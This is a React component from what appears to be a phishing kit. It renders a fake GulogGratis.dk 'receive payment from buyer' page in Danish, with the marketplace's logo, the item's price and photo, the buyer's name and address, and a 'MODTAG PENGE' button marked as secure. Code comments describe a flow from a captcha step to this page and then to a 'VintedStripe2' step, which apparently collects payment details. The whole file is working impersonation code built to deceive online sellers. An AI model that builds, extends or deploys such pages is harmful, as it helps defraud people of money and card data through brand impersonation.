import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './GulogGratisDkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const GG_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/dk-guloggratis/logo.png`;
const GG_STATUS_BANNER_SRC = `${process.env.PUBLIC_URL || ''}/dk-guloggratis/status-banner.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * GulogGratis (DK) — success: DK layout + CTA → index2 (VintedStripe2).
 * Flow: VintedStripe1 (captcha) → success → index2.
 */
function GulogGratisDkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'DKK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = (pageData?.first_name || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPlaceholder = !photoSrc || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="ggdk-wrap">
        <div className="ggdk-loading">Indlæser…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="ggdk-wrap">
      <header className="ggdk-header">
        <a className="ggdk-logo" href="#/" aria-label="GulogGratis.dk">
          <img src={GG_LOGO_SRC} alt="GulogGratis.dk" />
        </a>
      </header>

      <main className="ggdk-main">
        <h1 className="ggdk-title">Modtagelse af betaling fra køberen</h1>

        <div className="ggdk-topbar">
          <div className="ggdk-thumb" aria-hidden>
            {!showPlaceholder && (
              <img src={photoSrc} alt="" onError={() => setImgFailed(true)} />
            )}
          </div>
          <div className="ggdk-amounts">
            <div className="ggdk-amount-top">{amountLine}.</div>
            <div className="ggdk-amount-sub">{productName}</div>
          </div>
        </div>

        <div className="ggdk-grid">
          <section className="ggdk-card">
            <img className="ggdk-status-img" src={GG_STATUS_BANNER_SRC} alt="" />

            <div className="ggdk-section-h">Forsendelse detaljer</div>

            <div className="ggdk-field">
              <span className="ggdk-field-label">Leveringsadresse</span>
              <input className="ggdk-input" readOnly value={address} />
            </div>

            <div className="ggdk-split2">
              <div className="ggdk-field">
                <span className="ggdk-field-label">Efternavn</span>
                <input className="ggdk-input" readOnly value={lastName} />
              </div>
              <div className="ggdk-field">
                <span className="ggdk-field-label">Fornavn</span>
                <input className="ggdk-input" readOnly value={firstName} />
              </div>
            </div>

            <p className="ggdk-legal" style={{ marginTop: 14 }}>
              Når du har modtaget pengene, bedes du sende varerne til køber i henhold til de angivne data eller aflevere
              varerne til kureren, som vil ringe tilbage til dig inden for inden for 12 timer.
            </p>
            <p className="ggdk-legal" style={{ marginTop: 10 }}>
              Efter forsendelse af varer skal du angive til køberen forsendelsesnummer! Varerne skal sendes inden for inden
              for 3 dage efter modtagelse af penge.
            </p>
          </section>

          <aside className="ggdk-card">
            <p className="ggdk-right-amount">{amountLine}.</p>
            <Link to={index2Path} className="ggdk-btn">
              MODTAG PENGE
            </Link>
            <div className="ggdk-safe">
              <ShieldCheck />
              Modtagelse af betaling er sikker
            </div>
            <div className="ggdk-right-legal">
              Ved at klikke på knappen &quot;MODTAG PENGE&quot; accepterer du vilkårene og betingelserne i Brugerafkalen ved at
              bruge den online tjeneste &quot;Sikker tilbud&quot;.
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default GulogGratisDkSuccess;

